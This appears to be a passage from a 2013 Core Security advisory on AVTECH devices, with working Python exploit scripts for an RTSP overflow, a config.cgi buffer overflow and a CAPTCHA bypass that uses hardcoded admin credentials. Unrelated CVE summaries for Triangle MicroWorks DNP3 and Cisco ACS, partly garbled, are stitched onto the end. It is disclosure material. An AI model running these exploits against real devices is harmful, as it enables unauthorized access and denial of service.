Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n" trigger_pkt += "CSeq: 1\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" print "[*] Sending trigger" s.sendall(trigger_pkt) data = s.recv(1024) print '[*] Response:', repr(data), "\r\n" s.close() -----/ 7.2. *Buffer Overflow in config.cgi Parameters* [CVE-2013-4981] The following Python script exploits other buffer overflow condition; no authentication is required. /----- import httplib ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/ 7.3. *CAPTCHA Bypass* [CVE-2013-4982] The following Python proof of concept sends a wrong captcha in first place (just to verify that captcha protection is enabled); then, it sends ten requests with an arbitrary hardcoded captcha and its matching verification code. As a result, the captcha protection can by completely bypassed. /----- import httplib ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() -----/ 8. *Report Timeline* . 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'. 9. *References* [1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DNP3 .NET Protocol components 3.06.0.171 through 3.15.0.369, and DNP3 C libraries 3.06.0000 through 3.15.0000 allow remote attackers to cause a denial of service (infinite loop) via a crafted DNP3 TCP packet. Triangle MicroWorks is a US-based company that uses single or third-party component products to communicate with peripherals/slave devices using various transport protocols (OPC Client, IEC 60870-6 (TASE.2/ICCP) Client, IEC 60870-5, DNP3, Modbus). Triangle MicroWorks multiple product-related IP-based devices incorrectly verify input, allowing an attacker to exploit a vulnerability to submit a specially crafted TCP message to cause the software to cause an infinite loop, causing the process to crash and requiring a manual reboot to get normal functionality. Multiple Triangle MicroWorks products are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. Note: This issue affects the IP connected devices. SDG is a set of data acquisition and supervisory control system (SCADA) gateway products integrated in the server. DNP3 .NET Protocol components is a set of .NET framework components that support DNP3. DNP3 ANSI C source code libraries is a source code library based on the ANSI C standard

Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DNP3 .NET Protocol components 3.06.0.171 through 3.15.0.369, and DNP3 C libraries 3.06.0000 through 3.15.0000 allow physically proximate attackers to cause a denial of service (infinite loop) via crafted input over a serial line. Triangle MicroWorks is a US-based company that uses single or third-party component products to communicate with peripherals/slave devices using various transport protocols (OPC Client, IEC 60870-6 (TASE.2/ICCP) Client, IEC 60870-5, DNP3, Modbus). Multiple Triangle MicroWorks products are prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. NOTE: To exploit this issue, local access to the serial-based outstation is required. SDG is a set of data acquisition and supervisory control system (SCADA) gateway products integrated in the server. DNP3 .NET Protocol components is a set of .NET framework components that support DNP3. DNP3 ANSI C source code libraries is a source code library based on the ANSI C standard

The EAP-FAST authentication module in Cisco Secure Access Control Server (ACS) 4.x before 4.2.1.15.11, when a RADIUS server configuration is enabled, does not properly parse user identities, which allows remote attackers to execute arbitrary commands via crafted EAP-FAST packets, aka Bug ID CSCui57636. Vendors have confirmed this vulnerability Bug ID CSCui57636 It is released as.Skillfully crafted by a third party EAP-FAST An arbitrary command may be executed via a packet. Remote attackers can exploit this issue to execute arbitrary commands. This may facilitate a complete compromise of an affected device. This issue being tracked by Cisco Bug ID CSCui57636. When the RADIUS server configuration is enabled, the program does not correctly resolve user identities